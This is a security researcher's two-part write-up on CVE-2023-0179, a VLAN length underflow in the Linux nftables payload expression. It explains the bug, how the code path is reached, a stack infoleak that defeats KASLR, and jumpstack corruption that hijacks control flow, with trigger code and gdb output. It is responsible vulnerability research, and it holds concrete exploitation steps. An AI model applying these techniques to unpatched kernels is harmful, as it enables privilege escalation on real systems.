A couple of CVEs later I started noticing an emerging (and perhaps worrying) pattern: Netfilter bugs had been significantly increasing in the last months.

During my initial reads I ran into an awesome article from David Bouman titled How The Tables Have Turned: An analysis of two new Linux vulnerabilities in nf_tables describing the internals of nftables, a Netfilter component and newer version of iptables, in great depth. By the way, I highly suggest reading Sections 1 through 3 to become familiar with the terminology before continuing.

As the subsystem internals made more sense, I started appreciating Linux kernel exploitation more and more, and decided to give myself the challenge to look for a new CVE in the nftables system in a relatively short timeframe.

2. Key aspects of nftables

Touching on the most relevant concepts of nftables, it’s worth introducing only the key elements:

  • NFT tables define the traffic class to be processed (IP(v6), ARP, BRIDGE, NETDEV);
  • NFT chains define at what point in the network path to process traffic (before/after/while routing);
  • NFT rules: lists of expressions that decide whether to accept traffic or drop it.

In programming terms, rules can be seen as instructions and expressions are the single statements that compose them. Expressions can be of different types, and they’re collected inside the net/netfilter directory of the Linux tree, each file starting with the “nft_” prefix.
Each expression has a function table that groups several functions to be executed at a particular point in the workflow, the most important ones being .init, invoked when the rule is created, and .eval, called at runtime during rule evaluation.

Since rules and expressions can be chained together to reach a unique verdict, they have to store their state somewhere. NFT registers are temporary memory locations used to store such data.
For instance, nft_immediate stores a user-controlled immediate value into an arbitrary register, while nft_payload extracts data directly from the received socket buffer.
Registers can be referenced with a 4-byte granularity (NFT_REG32_00 through NFT_REG32_15) or with the legacy option of 16 bytes each (NFT_REG_1 through NFT_REG_4).

But what do tables, chains and rules actually look like from userland?

# nft list ruleset
table inet my_table {
  chain my_chain {
    type filter hook input priority filter; policy drop;
    tcp dport http accept
  }
}

This specific table monitors all IPv4 and IPv6 traffic. The only present chain is of the filter type, which must decide whether to keep packets or drop them, it’s installed at the input level, where traffic has already been routed to the current host and is looking for the next hop, and the default verdict is to drop the packet if the other rules haven’t concluded otherwise.
The rule above is translated into different expressions that carry out the following tasks:

  1. Save the transport header to a register;
  2. Make sure it’s a TCP header;
  3. Save the TCP destination port to a register;
  4. Emit the NF_ACCEPT verdict if the register contains the value 80 (HTTP port).

Since David’s article already contains all the architectural details, I’ll just move over to the relevant aspects.

2.1 Introducing Sets and Maps

One of the advantages of nftables over iptables is the possibility to match a certain field with multiple values. For instance, if we wanted to only accept traffic directed to the HTTP and HTTPS protocols, we could implement the following rule:

nft add rule ip4 filter input tcp dport {http, https} accept

In this case, HTTP and HTTPS internally belong to an “anonymous set” that carries the same lifetime as the rule bound to it. When a rule is deleted, any associated set is destroyed too.
In order to make a set persistent (aka “named set”), we can just give it a name, type and values:

nft add set filter AllowedProto { type inet_proto\; flags constant\;}
nft add element filter AllowedProto { https, https }

While this type of set is only useful to match against a list/range of values, nftables also provides maps, an evolution of sets behaving like the hash map data structure. One of their use cases, as mentioned in the wiki, is to pick a destination host based on the packet’s destination port:

nft add map nat porttoip  { type inet_service: ipv4_addr\; }
nft add element nat porttoip { 80 : 192.168.1.100, 8888 : 192.168.1.101 }

From a programmer’s point of view, registers are like local variables, only existing in the current chain, and sets/maps are global variables persisting over consecutive chain evaluations.

2.2 Programming with nftables

Finding a potential security issue in the Linux codebase is pointless if we can’t also define a procedure to trigger it and reproduce it quite reliably. That’s why, before digging into the code, I wanted to make sure I had all the necessary tools to programmatically interact with nftables just as if I were sending commands over the terminal.

We already know that we can use the netlink interface to send messages to the subsystem via an AF_NETLINK socket but, if we want to approach nftables at a higher level, the libnftnl project contains several examples showing how to interact with its components: we can thus send create, update and delete requests to all the previously mentioned elements, and libnftnl will take care of the implementation specifics.

For this particular project, I decided to start by examining the CVE-2022-1015 exploit source since it’s based on libnftnl and implements the most repetitive tasks such as building and sending batch requests to the netlink socket. This project also comes with functions to add expressions to rules, at least the most important ones, which makes building rules really handy.

3. Scraping the attack surface

To keep things simple, I decided that I would start by auditing the expression operations, which are invoked at different times in the workflow. Let’s take the nft_immediateexpression as an example:

static const struct nft_expr_ops nft_payload_ops = {
    .type       = &nft_payload_type,
    .size       = NFT_EXPR_SIZE(sizeof(struct nft_payload)),
    .eval       = nft_payload_eval,
    .init       = nft_payload_init,
    .dump       = nft_payload_dump,
    .reduce     = nft_payload_reduce,
    .offload    = nft_payload_offload,
};

Besides eval and init, which we’ve already touched on, there are a couple other candidates to keep in mind:

  • dump: reads the expression parameters and packs them into an skb. As a read-only operation, it represents an attractive attack surface for infoleaks rather than memory corruptions.
  • reduce: I couldn’t find any reference to this function call, which shied me away from it.
  • offload: adds support for nft_payload expression in case Flowtables are being used with hardware offload. This one definitely adds some complexity and deserves more attention in future research, although specific NIC hardware is required to reach the attack surface.

As my first research target, I ended up sticking with the same ops I started with, init and eval.

3.1 Previous vulnerabilities

We now know where to look for suspicious code, but what are we exactly looking for?
The netfilter bugs I was reading about definitely influenced the vulnerability classes in my scope:

CVE-2022-1015

/* net/netfilter/nf_tables_api.c */

static int nft_validate_register_load(enum nft_registers reg, unsigned int len)
{
    /* We can never read from the verdict register,
     * so bail out if the index is 0,1,2,3 */
    if (reg < NFT_REG_1 * NFT_REG_SIZE / NFT_REG32_SIZE)
        return -EINVAL;
    /* Invalid operation, bail out */
    if (len == 0)
        return -EINVAL;
    /* Integer overflow allows bypassing the check */
    if (reg * NFT_REG32_SIZE + len > sizeof_field(struct nft_regs, data)) 
        return -ERANGE;

    return 0;
}  

int nft_parse_register_load(const struct nlattr *attr, u8 *sreg, u32 len)
{
    ...
    err = nft_validate_register_load(reg, len);
    if (err < 0)
        return err;
    /* the 8 LSB from reg are written to sreg, which can be used as an index 
     * for read and write operations in some expressions */
    *sreg = reg;
    return 0;
}  

I also had a look at different subsystems, such as TIPC.

CVE-2022-0435

/* net/tipc/monitor.c */

void tipc_mon_rcv(struct net *net, void *data, u16 dlen, u32 addr,
    struct tipc_mon_state *state, int bearer_id)
{
    ...
    struct tipc_mon_domain *arrv_dom = data;
    struct tipc_mon_domain dom_bef;                                   
    ...

    /* doesn't check for maximum new_member_cnt */                      
    if (dlen < dom_rec_len(arrv_dom, 0))                              
        return;
    if (dlen != dom_rec_len(arrv_dom, new_member_cnt))                
        return;
    if (dlen < new_dlen || arrv_dlen != new_dlen)
        return; 
    ...
    /* Drop duplicate unless we are waiting for a probe response */
    if (!more(new_gen, state->peer_gen) && !probing)                  
        return;
    ...

    /* Cache current domain record for later use */
    dom_bef.member_cnt = 0;
    dom = peer->domain;
    /* memcpy with out of bounds domain record */
    if (dom)                                                         
        memcpy(&dom_bef, dom, dom->len);           

A common pattern can be derived from these samples: if we can pass the sanity checks on a certain boundary, either via integer overflow or incorrect logic, then we can reach a write primitive which will write data out of bounds. In other words, typical buffer overflows can still be interesting!

Here is the structure of the ideal vulnerable code chunk: one or more if statements followed by a write instruction such as memcpymemset, or simply *x = y inside all the eval and init operations of the net/netfilter/nft_*.c files.

3.2 Spotting a new bug

At this point, I downloaded the latest stable Linux release from The Linux Kernel Archives, which was 6.1.6 at the time, opened it up in my IDE (sadly not vim) and started browsing around.

I initially tried with regular expressions but I soon found it too difficult to exclude the unwanted sources and to match a write primitive with its boundary checks, plus the results were often overwhelming. Thus I moved on to the good old manual auditing strategy.
For context, this is how quickly a regex can become too complex:
if\s*\(\s*(\w+\s*[+\-*/]\s*\w+)\s*(==|!=|>|<|>=|<=)\s*(\w+\s*[+\-*/]\s*\w+)\s*\)\s*\{

Turns out that semantic analysis engines such as CodeQL and Weggli would have done a much better job, I will show how they can be used to search for similar bugs in a later article.

While exploring the nft_payload_eval function, I spotted an interesting occurrence:

/* net/netfilter/nft_payload.c */

switch (priv->base) {
    case NFT_PAYLOAD_LL_HEADER:
        if (!skb_mac_header_was_set(skb))
            goto err;
        if (skb_vlan_tag_present(skb)) {
            if (!nft_payload_copy_vlan(dest, skb,
                           priv->offset, priv->len))
                goto err;
            return;
        }

The nft_payload_copy_vlan function is called with two user-controlled parameters: priv->offset and priv->len. Remember that nft_payload’s purpose is to copy data from a particular layer header (IP, TCP, UDP, 802.11…) to an arbitrary register, and the user gets to specify the offset inside the header to copy data from, as well as the size of the copied chunk.

The following code snippet illustrates how to copy the destination address from the IP header to register 0 and compare it against a known value:

int create_filter_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq)
{
    struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
    in_addr_t d_addr;
    d_addr = inet_addr("192.168.123.123");
    rule_add_payload(r, NFT_PAYLOAD_NETWORK_HEADER, offsetof(struct iphdr, daddr), sizeof d_addr, NFT_REG32_00);
    rule_add_cmp(r, NFT_CMP_EQ, NFT_REG32_00, &d_addr, sizeof d_addr);
    rule_add_immediate_verdict(r, NFT_GOTO, "next_chain");
    return send_batch_request(
        nl,
        NFT_MSG_NEWRULE | (NFT_TYPE_RULE << 8),
        NLM_F_CREATE, family, (void**)&r, seq,
        NULL
    );
}

All definitions for the rule_* functions can be found in my Github project.

When I looked at the code under nft_payload_copy_vlan, a frequent C programming pattern caught my eye:

/* net/netfilter/nft_payload.c */

if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
	ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;

memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

These lines determine the size of a memcpy call based on a fairly extended arithmetic operation. I later found out their purpose was to align the skb pointer to the maximum allowed offset, which is the end of the second VLAN tag (at most 2 tags are allowed). VLAN encapsulation is a common technique used by providers to separate customers inside the provider’s network and to transparently route their traffic.

At first I thought I could cause an overflow in the conditional statement, but then I realized that the offset + len expression was being promoted to a uint32_t from uint8_t, making it impossible to reach MAX_INT with 8-bit values:

<+396>:   mov   r11d,DWORD PTR [rbp-0x64]
<+400>:   mov   r10d,DWORD PTR [rbp-0x6c]
gef➤ x/wx $rbp-0x64
0xffffc90000003a0c:   0x00000004
gef➤ x/wx $rbp-0x6c
0xffffc90000003a04:   0x00000013

The compiler treats the two operands as DWORD PTR, hence 32 bits.

After this first disappointment, I started wandering elsewhere, until I came back to the same spot to double check that piece of code which kept looking suspicious.

On the next line, when assigning the ethlen variable, I noticed that the VLAN header length (4 bytes) vlan_hlen was being subtracted from ethlen instead of being added to restore the alignment with the second VLAN tag.
By trying all possible offset and len pairs, I could confirm that some of them were actually causing ethlen to underflow, wrapping it back to UINT8_MAX.
With a vulnerability at hand, I documented my findings and promptly sent them to security@kernel.org and the involved distros.
I also accidentally alerted some public mailing lists such as syzbot’s, which caused a small dispute to decide whether the issue should have been made public immediately via oss-security or not. In the end we managed to release the official patch for the stable tree in a day or two and proceeded with the disclosure process.

How an Out-Of-Bounds Copy Vulnerability works:

OOB Write: reading from an accessible memory area and subsequently writing to areas outside the destination buffer

OOB Read: reading from a memory area outside the source buffer and writing to readable areas

The behavior of CVE-2023-0179:

Expected scenario: The size of the copy operation “len” is correctly decreased to exclude restricted fields, and saved in “ethlen”

Vulnerable scenario: the value of “ethlen” is decreased below zero, and wraps to the maximum value (255), allowing even inaccessible fields to be copied

4. Reaching the code path

Even the most powerful vulnerability is useless unless it can be triggered, even in a probabilistic manner; here, we’re inside the evaluation function for the nft_payload expression, which led me to believe that if the code branch was there, then it must be reachable in some way (of course this isn’t always the case).

I’ve already shown how to setup the vulnerable rule, we just have to choose an overflowing offset/length pair like so:

uint8_t offset = 19, len = 4;
struct nftnl_rule* r = build_rule(table_name, chain_name, family, handle);
rule_add_payload(r, NFT_PAYLOAD_LL_HEADER, offset, len, NFT_REG32_00);

Once the rule is in place, we have to force its evaluation by generating some traffic, unfortunately normal traffic won’t pass through the nft_payload_copy_vlan function, only VLAN-tagged packets will.

4.1 Debugging nftables

From here on, gdb’s assistance proved to be crucial to trace the network paths for input packets.
I chose to spin up a QEMU instance with debugging support, since it’s really easy to feed it your own kernel image and rootfs, and then attach gdb from the host.

When booting from QEMU, it will be more practical to have the kernel modules you need automatically loaded:

# not all configs are required for this bug
CONFIG_VLAN_8021Q=y
CONFIG_VETH=y
CONFIG_BRIDGE=y
CONFIG_BRIDGE_NETFILTER=y
CONFIG_NF_TABLES=y
CONFIG_NF_TABLES_INET=y
CONFIG_NF_TABLES_NETDEV=y
CONFIG_NF_TABLES_IPV4=y
CONFIG_NF_TABLES_ARP=y
CONFIG_NF_TABLES_BRIDGE=y
CONFIG_USER_NS=y
CONFIG_CMDLINE_BOOL=y
CONFIG_CMDLINE="net.ifnames=0"

As for the initial root file system, one with the essential networking utilities can be built for x86_64 (openssh, bridge-utils, nft) by following this guide. Alternatively, syzkaller provides the create-image.sh script which automates the process.
Once everything is ready, QEMU can be run with custom options, for instance:

qemu-system-x86_64 -kernel linuxk/linux-6.1.6/vmlinux -drive format=raw,file=linuxk/buildroot/output/images/rootfs.ext4,if=virtio -nographic -append "root=/dev/vda console=ttyS0" -net nic,model=e1000 -net user,hostfwd=tcp::10022-:22,hostfwd=udp::5556-:1337

This setup allows communicating with the emulated OS via SSH on ports 10022:22 and via UDP on ports 5556:1337. Notice how the host and the emulated NIC are connected indirectly via a virtual hub and aren’t placed on the same segment.
After booting the kernel up, the remote debugger is accessible on local port 1234, hence we can set the required breakpoints:

turtlearm@turtlelinux:~/linuxk/old/linux-6.1.6$ gdb vmlinux
GNU gdb (Ubuntu 12.1-0ubuntu1~22.04) 12.1
...                 
88 commands loaded and 5 functions added for GDB 12.1 in 0.01ms using Python engine 3.10
Reading symbols from vmlinux...               
gef➤  target remote :1234
Remote debugging using :1234
(remote) gef➤  info b
Num     Type           Disp Enb Address            What
1       breakpoint     keep y   0xffffffff81c47d50 in nft_payload_eval at net/netfilter/nft_payload.c:133
2       breakpoint     keep y   0xffffffff81c47ebf in nft_payload_copy_vlan at net/netfilter/nft_payload.c:64

Now, hitting breakpoint 2 will confirm that we successfully entered the vulnerable path.

4.2 Main issues

How can I send a packet which definitely enters the correct path? Answering this question was more troublesome than expected.

UDP is definitely easier to handle than TCP, a UDP socket (SOCK_DGRAM) wouldn’t let me add a VLAN header (layer 2), but using a raw socket was out of the question as it would bypass the network stack including the NFT hooks.

Instead of crafting my own packets, I just tried configuring a VLAN interface on the ethernet device eth0:

ip link add link eth0 name vlan.10 type vlan id 10
ip addr add 192.168.10.137/24 dev vlan.10
ip link set vlan.10 up

With these commands I could bind a UDP socket to the vlan.10 interface and hope that I would detect VLAN tagged packets leaving through eth0. Of course, that wasn’t the case because the new interface wasn’t holding the necessary routes, and only ARP requests were being produced whatsoever.

Another attempt involved replicating the physical use case of encapsulated VLANs (Q-in-Q) but in my local network to see what I would receive on the destination host.
Surprisingly, after setting up the same VLAN and subnet on both machines, I managed to emit VLAN-tagged packets from the source host but, no matter how many tags I embedded, they were all being stripped out from the datagram when reaching the destination interface.

This behavior is due to Linux acting as a router. Since a VLAN ends when a router is met, being a level 2 protocol, it would be useless for Netfilter to process those tags.

Going back to the kernel source, I was able to spot the exact point where the tag was being stripped out during a process called VLAN offloading, where the NIC driver removes the tag and forwards traffic to the networking stack.

The __netif_receive_skb_core function takes the previously crafted skb and delivers it to the upper protocol layers by calling deliver_skb.
802.1q packets are subject to VLAN offloading here:

/* net/core/dev.c */

static int __netif_receive_skb_core(struct sk_buff **pskb, bool pfmemalloc,
				    struct packet_type **ppt_prev)
{
...
if (eth_type_vlan(skb->protocol)) {
	skb = skb_vlan_untag(skb);
	if (unlikely(!skb))
		goto out;
}
...
}

skb_vlan_untag also sets the vlan_tcivlan_proto, and vlan_present fields of the skb so that the network stack can later fetch the VLAN information if needed.
The function then calls all tap handlers like the protocol sniffers that are listed inside the ptype_all list and finally enters another branch that deals with VLAN packets:

/* net/core/dev.c */

if (skb_vlan_tag_present(skb)) {
	if (pt_prev) {
		ret = deliver_skb(skb, pt_prev, orig_dev);
		pt_prev = NULL;
	}
	if (vlan_do_receive(&skb)) {
		goto another_round;
	}
	else if (unlikely(!skb))
		goto out;
}

The main actor here is vlan_do_receive that actually delivers the 802.1q packet to the appropriate VLAN port. If it finds the appropriate interface, the vlan_present field is reset and another round of __netif_receive_skb_core is performed, this time as an untagged packet with the new device interface.

However, these 3 lines got me curious because they allowed skipping the vlan_presentreset part and going straight to the IP receive handlers with the 802.1q packet, which is what I needed to reach the nft hooks:

/* net/8021q/vlan_core.c */

vlan_dev = vlan_find_dev(skb->dev, vlan_proto, vlan_id);
if (!vlan_dev)  // if it cannot find vlan dev, go back to netif_receive_skb_core and don't untag
	return false;
...
__vlan_hwaccel_clear_tag(skb); // unset vlan_present flag, making skb_vlan_tag_present false

Remember that the vulnerable code path requires vlan_present to be set (from skb_vlan_tag_present(skb)), so if I sent a packet from a VLAN-aware interface to a VLAN-unaware interface, vlan_do_receive would return false without unsetting the present flag, and that would be perfect in theory.

One more problem arose at this point: the nft_payload_copy_vlan function requires the skb protocol to be either ETH_P_8021AD or ETH_P_8021Q, otherwise vlan_hlen won’t be assigned and the code path won’t be taken:

/* net/netfilter/nft_payload.c */

static bool nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
{
...
if ((skb->protocol == htons(ETH_P_8021AD) ||
	 skb->protocol == htons(ETH_P_8021Q)) &&
	offset >= VLAN_ETH_HLEN && offset < VLAN_ETH_HLEN + VLAN_HLEN)
		vlan_hlen += VLAN_HLEN;

Unfortunately, skb_vlan_untag will also reset the inner protocol, making this branch impossible to enter, in the end this path turned out to be rabbit hole.

While thinking about a different approach I remembered that, since VLAN is a layer 2 protocol, I should have probably turned Ubuntu into a bridge and saved the NFT rules inside the NFPROTO_BRIDGE hooks.
To achieve that, a way to merge the features of a bridge and a VLAN device was needed, enter VLAN filtering!
This feature was introduced in Linux kernel 3.8 and allows using different subnets with multiple guests on a virtualization server (KVM/QEMU) without manually creating VLAN interfaces but only using one bridge.
After creating the bridge, I had to enter promiscuous mode to always reach the NF_BR_LOCAL_IN bridge hook:

/* net/bridge/br_input.c */

static int br_pass_frame_up(struct sk_buff *skb) {
...
	/* Bridge is just like any other port.  Make sure the
	 * packet is allowed except in promisc mode when someone
	 * may be running packet capture.
	 */
	if (!(brdev->flags & IFF_PROMISC) &&
	    !br_allowed_egress(vg, skb)) {
		kfree_skb(skb);
		return NET_RX_DROP;
	}
...
	return NF_HOOK(NFPROTO_BRIDGE, NF_BR_LOCAL_IN,
		       dev_net(indev), NULL, skb, indev, NULL,
		       br_netif_receive_skb);

and finally enable VLAN filtering to enter the br_handle_vlan function (/net/bridge/br_vlan.c) and avoid any __vlan_hwaccel_clear_tag call inside the bridge module.

sudo ip link set br0 type bridge vlan_filtering 1
sudo ip link set br0 promisc on

While this configuration seemed to work at first, it became unstable after a very short time, since when vlan_filtering kicked in I stopped receiving traffic.

All previous attempts weren’t nearly as reliable as I needed them to be in order to proceed to the exploitation stage. Nevertheless, I learned a lot about the networking stack and the Netfilter implementation.

4.3 The Netfilter Holy Grail

Netfilter hooks

While I could’ve continued looking for ways to stabilize VLAN filtering, I opted for a handier way to trigger the bug.

This chart was taken from the nftables wiki and represents all possible packet flows for each family. The netdev family is of particular interest since its hooks are located at the very beginning, in the Ingress hook.
According to this article the netdev family is attached to a single network interface and sees all network traffic (L2+L3+ARP).
Going back to __netif_receive_skb_core I noticed how the ingress handler was called before vlan_do_receive (which removes the vlan_present flag), meaning that if I could register a NFT hook there, it would have full visibility over the VLAN information:

/* net/core/dev.c */

static int __netif_receive_skb_core(struct sk_buff **pskb, bool pfmemalloc, struct packet_type **ppt_prev) {
...
#ifdef CONFIG_NET_INGRESS
...
    if (nf_ingress(skb, &pt_prev, &ret, orig_dev) < 0) // insert hook here
        goto out;
#endif
...
    if (skb_vlan_tag_present(skb)) {
        if (pt_prev) {
            ret = deliver_skb(skb, pt_prev, orig_dev);
            pt_prev = NULL;
        }
        if (vlan_do_receive(&skb)) // delete vlan info
            goto another_round;
        else if (unlikely(!skb))
            goto out;
    }
...

The convenient part is that you don’t even have to receive the actual packets to trigger such hooks because in normal network conditions you will always(?) get the respective ARP requests on broadcast, also carrying the same VLAN tag!

Here’s how to create a base chain belonging to the netdev family:

struct nftnl_chain* c;
c = nftnl_chain_alloc();
nftnl_chain_set_str(c, NFTNL_CHAIN_NAME, chain_name);
nftnl_chain_set_str(c, NFTNL_CHAIN_TABLE, table_name);
if (dev_name)
    nftnl_chain_set_str(c, NFTNL_CHAIN_DEV, dev_name); // set device name
if (base_param) { // set ingress hook number and max priority
    nftnl_chain_set_u32(c, NFTNL_CHAIN_HOOKNUM, NF_NETDEV_INGRESS);
    nftnl_chain_set_u32(c, NFTNL_CHAIN_PRIO, INT_MIN);
}

And that’s it, you can now send random traffic from a VLAN-aware interface to the chosen network device and the ARP requests will trigger the vulnerable code path.

64 bytes and a ROP chain – A journey through nftables – Part 2

2.1. Getting an infoleak

Can I turn this bug into something useful? At this point I somewhat had an idea that would allow me to leak some data, although I wasn’t sure what kind of data would have come out of the stack.
The idea was to overflow into the first NFT register (NFT_REG32_00) so that all the remaining ones would contain the mysterious data. It also wasn’t clear to me how to extract this leak in the first place, when I vaguely remembered about the existence of the nft_dynset expression from CVE-2022-1015, which inserts key:data pairs into a hashmap-like data structure (which is actually an nft_set) that can be later fetched from userland. Since we can add registers to the dynset, we can reference them like so:
key[i] = NFT_REG32_i, value[i] = NFT_REG32_(i+8)
This solution should allow avoiding duplicate keys, but we should still check that all key registers contain different values, otherwise we will lose their values.

2.1.1 Returning the registers

Having a programmatic way to read the content of a set would be best in this case, Randorisec accomplished the same task in their CVE-2022-1972 infoleak exploit, where they send a netlink message of the NFT_MSG_GETSET type and parse the received message from an iovec.
Although this technique seems to be the most straightforward one, I went for an easier one which required some unnecessary bash scripting.
Therefore, I decided to employ the nft utility (from the nftables package) which carries out all the parsing for us.

If I wanted to improve this part, I would definitely parse the netlink response without the external dependency of the nft binary, which makes it less elegant and much slower.

After overflowing, we can run the following command to retrieve all elements of the specified map belonging to a netdev table:

$ nft list map netdev {table_name} {set_name}

table netdev mytable {
	map myset12 {
		type 0x0 [invalid type] : 0x0 [invalid type]
		size 65535
		elements = { 0x0 [invalid type] : 0x0 [invalid type],
			     0x5810000 [invalid type] : 0xc9ffff30 [invalid type],
			     0xbccb410 [invalid type] : 0x88ffff10 [invalid type],
			     0x3a000000 [invalid type] : 0xcfc281ff [invalid type],
			     0x596c405f [invalid type] : 0x7c630680 [invalid type],
			     0x78630680 [invalid type] : 0x3d000000 [invalid type],
			     0x88ffff08 [invalid type] : 0xc9ffffe0 [invalid type],
			     0x88ffffe0 [invalid type] : 0xc9ffffa1 [invalid type],
			     0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }
	}
}

2.1.2 Understanding the registers

Seeing all those ffff was already a good sign, but let’s review the different kernel addresses we could run into (this might change due to ASLR and other factors):

  • .TEXT (code) section addresses: 0xffffffff8[1-3]……
  • Stack addresses: 0xffffc9……….
  • Heap addresses: 0xffff8880……..

We can ask gdb for a second opinion to see if we actually spotted any of them:

gef➤ p &regs 
$12 = (struct nft_regs *) 0xffffc90000003ae0
gef➤ x/12gx 0xffffc90000003ad3
0xffffc90000003ad3:    0x0ce92fffffc90000    0xffffffffffffff81
Oxffffc90000003ae3:    0x071d0000000000ff    0x008105ffff888004
0xffffc90000003af3:    0xb4cc0b5f406c5900    0xffff888006637810    <==
0xffffc90000003b03:    0xffff888006637808    0xffffc90000003ae0    <==
0xffffc90000003b13:    0xffff888006637c30    0xffffc90000003d10
0xffffc90000003b23:    0xffffc90000003ce0    0xffffffff81c2cfa1    <==

ooks like a stack canary is present at address 0xffffc90000003af3, which could be useful later when overwriting one of the saved instruction pointers on the stack but, moreover, we can see an instruction address (0xffffffff81c2cfa1) and the regs variable reference itself (0xffffc90000003ae0)!
Gdb also tells us that the instruction belongs to the nft_do_chain routine:

gef➤ x/i 0xffffffff81c2cfa1
0xffffffff81c2cfa1 <nft_do_chain+897>:    jmp    0xffffffff81c2cda7 <nft_do_chain+391>

Based on that information I could use the address in green to calculate the KASLR slide by pulling it out of a KASLR-enabled system and subtracting them.

Since it would be too inconvenient to reassemble these addresses manually, we could select the NFT registers containing the interesting data and add them to the set, leading to the following result:

table netdev {table_name} {
	map {set_name} {
		type 0x0 [invalid type] : 0x0 [invalid type]
		size 65535
		elements = { 0x88ffffe0 [invalid type] : 0x3a000000 [invalid type],     <== (1)
			           0xc9ffffa1 [invalid type] : 0xcfc281ff [invalid type] }    <== (2)   
	}
}

From the output we could clearly discern the shuffled regs (1) and nft_do_chain (2) addresses.
To explain how this infoleak works, I had to map out the stack layout at the time of the overflow, as it stays the same upon different nft_do_chain runs.

The regs struct is initialized with zeros at the beginning of nft_do_chain, and is immediately followed by the nft_jumpstack struct, containing the list of rules to be evaluated on the next nft_do_chain call, in a stack-like format (LIFO).

The vulnerable memcpy source is evaluated from the vlanh pointer referring to the struct vlan_ethhdr veth local variable, which resides in the nft_payload_eval stack frame, since nft_payload_copy_vlan is inlined by the compiler.
The copy operation therefore looks something like the following:

State of the stack post-overflow

he red zones represent memory areas that have been corrupted with mostly unpredictable data, whereas the yellow ones are also partially controlled when pointing dst_u8 to the first register. The NFT registers are thus overwritten with data belonging to the nft_payload_eval stack frame, including the respective stack cookie and return address.

2.2 Elevating the tables

With a pretty solid infoleak at hand, it was time to move on to the memory corruption part.
While I was writing the initial vuln report, I tried switching the exploit register to the highest possible one (NFT_REG32_15) to see what would happen.

Surprisingly, I couldn’t reach the return address, indicating that a classic stack smashing scenario wasn’t an option. After a closer look, I noticed a substantially large structure, nft_jumpstack, which is 16*24 bytes long, absorbing the whole overflow.

2.2.1 Jumping between the stacks

The jumpstack structure I introduced in the previous section keeps track of the rules that have yet to be evaluated in the previous chains that have issued an NFT_JUMP verdict.

  • When the rule ruleA_1 in chainA desires to transfer the execution to another chain, chainB, it issues the NFT_JUMP verdict.
  • The next rule in chainAruleA_2, is stored in the jumpstack at the stackptr index, which keeps track of the depth of the call stack.
  • This is intended to restore the execution of ruleA_2 as soon as chainB has returned via the NFT_CONTINUE or NFT_RETURN verdicts.

This aspect of the nftables state machine isn’t that far from function stack frames, where the return address is pushed by the caller and then popped by the callee to resume execution from where it stopped.

While we can’t reach the return address, we can still hijack the program’s control flow by corrupting the next rule to be evaluated!

In order to corrupt as much regs-adjacent data as possible, the destination register should be changed to the last one, so that it’s clear how deep into the jumpstack the overflow goes.
After filling all registers with placeholder values and triggering the overflow, this was the result:

gef➤  p jumpstack
$334 = {{
    chain = 0x1017ba2583d7778c,         <== vlan_ethhdr data
    rule = 0x8ffff888004f11a,
    last_rule = 0x50ffff888004f118
  }, {
    chain = 0x40ffffc900000e09,
    rule = 0x60ffff888004f11a,
    last_rule = 0x50ffffc900000e0b
  }, {
    chain = 0xc2ffffc900000e0b,
    rule = 0x1ffffffff81d6cd,
    last_rule = 0xffffc9000f4000
  }, {
    chain = 0x50ffff88807dd21e,
    rule = 0x86ffff8880050e3e,
    last_rule = 0x8000000001000002      <== random data from the stack
  }, {
    chain = 0x40ffff88800478fb,
    rule = 0xffff888004f11a,
    last_rule = 0x8017ba2583d7778c
  }, {
    chain = 0xffff88807dd327,
    rule = 0xa9ffff888004764e,
    last_rule = 0x50000000ef7ad4a
  }, {
    chain = 0x0 ,
    rule = 0xff00000000000000,
    last_rule = 0x8000000000ffffff
  }, {
    chain = 0x41ffff88800478fb,
    rule = 0x4242424242424242,         <== regs are copied here: full control over rule and last_rule
    last_rule = 0x4343434343434343
  }, {
    chain = 0x4141414141414141,
    rule = 0x4141414141414141,
    last_rule = 0x4141414141414141
  }, {
    chain = 0x4141414141414141,
    rule = 0x4141414141414141,
    last_rule = 0x8c00008112414141

The copy operation has a big enough size to include the whole regs buffer in the source, this means that we can partially control the jumpstack!
The gef output shows how only the end of our 251-byte overflow is controllable and, if aligned correctly, it can overwrite the 8th and 9th rule and last_rule pointers.
To confirm that we are breaking something, we could just jump to 9 consecutive chains, and when evaluating the last one trigger the overflow and hopefully jump to jumpstack[8].rule:
As expected, we get a protection fault:

 1849.727034] general protection fault, probably for non-canonical address 0x4242424242424242: 0000 [#1] PREEMPT SMP NOPTI
[ 1849.727034] CPU: 1 PID: 0 Comm: swapper/1 Not tainted 6.2.0-rc1 #5
[ 1849.727034] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 1849.727034] RIP: 0010:nft_do_chain+0xc1/0x740
[ 1849.727034] Code: 40 08 48 8b 38 4c 8d 60 08 4c 01 e7 48 89 bd c8 fd ff ff c7 85 00 fe ff ff ff ff ff ff 4c 3b a5 c8 fd ff ff 0f 83 4
[ 1849.727034] RSP: 0018:ffffc900000e08f0 EFLAGS: 00000297
[ 1849.727034] RAX: 4343434343434343 RBX: 0000000000000007 RCX: 0000000000000000
[ 1849.727034] RDX: 00000000ffffffff RSI: ffff888005153a38 RDI: ffffc900000e0960
[ 1849.727034] RBP: ffffc900000e0b50 R08: ffffc900000e0950 R09: 0000000000000009
[ 1849.727034] R10: 0000000000000017 R11: 0000000000000009 R12: 4242424242424242
[ 1849.727034] R13: ffffc900000e0950 R14: ffff888005153a40 R15: ffffc900000e0b60
[ 1849.727034] FS: 0000000000000000(0000) GS:ffff88807dd00000(0000) knlGS:0000000000000000
[ 1849.727034] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1849.727034] CR2: 000055e3168e4078 CR3: 0000000003210000 CR4: 00000000000006e0

Let’s explore the nft_do_chain routine to understand what happened:

/* net/netfilter/nf_tables_core.c */

unsigned int nft_do_chain(struct nft_pktinfo *pkt, void *priv) {
	const struct nft_chain *chain = priv, *basechain = chain;
	const struct nft_rule_dp *rule, *last_rule;
	const struct net *net = nft_net(pkt);
	const struct nft_expr *expr, *last;
	struct nft_regs regs = {};
	unsigned int stackptr = 0;
	struct nft_jumpstack jumpstack[NFT_JUMP_STACK_SIZE];
	bool genbit = READ_ONCE(net->nft.gencursor);
	struct nft_rule_blob *blob;
